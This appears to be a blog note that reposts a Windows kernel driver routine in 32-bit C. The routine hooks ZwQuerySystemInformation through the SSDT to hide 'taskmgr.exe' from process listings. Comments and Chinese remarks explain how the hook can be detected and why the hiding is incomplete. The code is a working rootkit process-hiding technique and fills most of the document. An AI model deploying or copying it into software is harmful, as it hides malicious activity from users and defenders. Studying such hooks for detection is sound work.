[資料] http://www.shnenglu.com/sleepwom/archive/2009/10/24/99375.html
/*
 * Replacement routine installed in the SSDT slot of ZwQuerySystemInformation.
 *
 * Every call is forwarded unchanged to the saved original
 * (OldZwQuerySystemInformation). When that call succeeds and the requested
 * information class is 5 (SystemProcessInformation), the returned
 * _SYSTEM_PROCESSES list is walked and any record whose ProcessName equals
 * "taskmgr.exe" (case-insensitive compare) is unlinked by rewriting the
 * NextEntryDelta of the record before it.
 *
 * Defender's view of what this leaves behind:
 *  - The SSDT entry for ZwQuerySystemInformation points outside the kernel
 *    image; an SSDT integrity check (table vs. on-disk ntoskrnl or a
 *    known-good copy) exposes the hook directly.
 *  - Only the NextEntryDelta link is changed. The hidden record's bytes stay
 *    in the caller's buffer and ReturnLength is never adjusted, so a
 *    cross-view comparison, or any enumerator that does not rely solely on
 *    NextEntryDelta, still sees the process (the author notes this below).
 *  - The KdPrint literal in the match branch is a fixed string visible in a
 *    kernel debugger and in the driver image itself.
 *
 * Parameters: all four are passed straight through to the original routine.
 * Returns:    the original routine's NTSTATUS, unmodified.
 * Note:       pointer arithmetic goes through ULONG, so this is 32-bit code.
 */
NTSTATUS MyZwQuerySystemInformation(IN ULONG SystemInformationClass,
                                    IN PVOID SystemInformation,
                                    IN ULONG SystemInformationLength,
                                    OUT PULONG ReturnLength)
// the hook function that replaces the original entry
{
    NTSTATUS rc;
    UNICODE_STRING process_name;

    // Name to filter out of the process list; compared below with
    // RtlEqualUnicodeString, CaseInSensitive = 1.
    RtlInitUnicodeString(&process_name, L"taskmgr.exe");

    // Let the real service fill the caller's buffer first.
    rc = (OldZwQuerySystemInformation) (
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength);

    if (NT_SUCCESS(rc))
    {
        // 5 == SystemProcessInformation: buffer holds a chain of
        // _SYSTEM_PROCESSES records linked by byte offsets (NextEntryDelta).
        if (5 == SystemInformationClass)
        {
            struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
            struct _SYSTEM_PROCESSES *prev = NULL;   // record preceding curr, NULL until the loop advances

            // The first record is stepped over before the loop begins: it is
            // never compared and never becomes prev.
            if (curr->NextEntryDelta)
                curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);

            while (curr)
            {
                if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))
                {
                    // Debug-output artifact: constant string, detectable.
                    KdPrint(("hide process'name taskmgr.exe"));

                    if (prev)
                    {
                        // Unlink curr: make prev's offset skip over it.
                        // When curr is the last record, prev becomes the last.
                        if (curr->NextEntryDelta)
                        {
                            prev->NextEntryDelta += curr->NextEntryDelta;
                        }
                        else
                        {
                            prev->NextEntryDelta = 0;
                        }
                    }
                    else
                    {
                        // No predecessor: only the local parameter copy
                        // SystemInformation is reassigned here. The caller's
                        // buffer and the record it starts with are untouched.
                        if (curr->NextEntryDelta)
                        {
                            SystemInformation = (PVOID)((ULONG)SystemInformation + curr->NextEntryDelta);
                        }
                        else
                        {
                            SystemInformation = NULL;
                        }
                    }

                    // Advance past the matched record (prev is left as is).
                    if (curr->NextEntryDelta)
                        curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);
                    else
                    {
                        curr = NULL;
                        break;
                    }
                } // if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))

                // Normal step: remember curr as prev and move to the next
                // record; a zero NextEntryDelta marks the end of the chain.
                if (curr != NULL)
                {
                    prev = curr;

                    if (curr->NextEntryDelta)
                        curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);
                    else
                        curr = NULL;
                } // if(curr != NULL)
            } // while(curr)
        } // if(5 == SystemInformationClass)
    } // if(NT_SUCCESS(rc))

    // KdPrint(("HookZwQuerySystemInformation is Succeessfully. \n"));
    return rc;
}
使用自己的查詢進程EXE(
HOOK SSDT Hide Process (五) ),顯示結果是正常的
驅動中判斷的是
taskmgr.exe ,在遍歷時,
taskmgr.exe 剛好在最後一個,把
NextEntryDelta 設置為 0 了
如果是其它的 abc.exe ,然后再打開 taskmgr.exe 是沒問題的
看來,HOOK SSDT Hide Process (五) 遍歷進程的實現 跟 Taskmgr.exe 的實現有差異, 需要再找時間看下原因
從 MyZwQuerySystemInformation() 的實現來看,只是簡單地修改了下 NextEntryDelta ,并非真正意義上的'隱藏'
還是會把數據傳給用戶態。